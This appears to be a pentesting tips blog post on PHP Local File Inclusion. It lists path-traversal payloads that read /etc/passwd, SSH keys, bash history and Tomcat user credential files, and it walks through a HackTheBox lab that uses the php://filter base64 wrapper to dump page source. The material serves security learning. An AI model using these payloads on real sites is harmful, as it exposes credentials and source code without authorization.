Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Tips & Tricks, WebApp 101

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page.

In this example, we’ll be using FRIENDZONE on HackTheBox.


Confirming LFI on our example

At the following URL, we found that we have LFI capabilities on the ?pagename parameter. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we adjust ?pagename to the name of a php page that exists on the box, it will display that page beneath the “Something wen worng” text. For example, let’s view the contents of a php page named timestamp.php.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp


Using Base64 Encoding to View Source Code

We can specify the following PHP Wrapper to encode a file in Base64.

php://filter/convert.base64-encode/resource=<filename>

Let’s inject that into our LFI, and specify the file we want to view the contents of (login.php)
https://administrator1.friendzone.red/dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login

Now, let’s copy that returned Base64 and run the following command within Kali.

echo -n <Base64> | base64 -d

The results show us the source code of login.php! We could also rerun the above command with > login.php appended to save our own file.


That’s it! Super simple.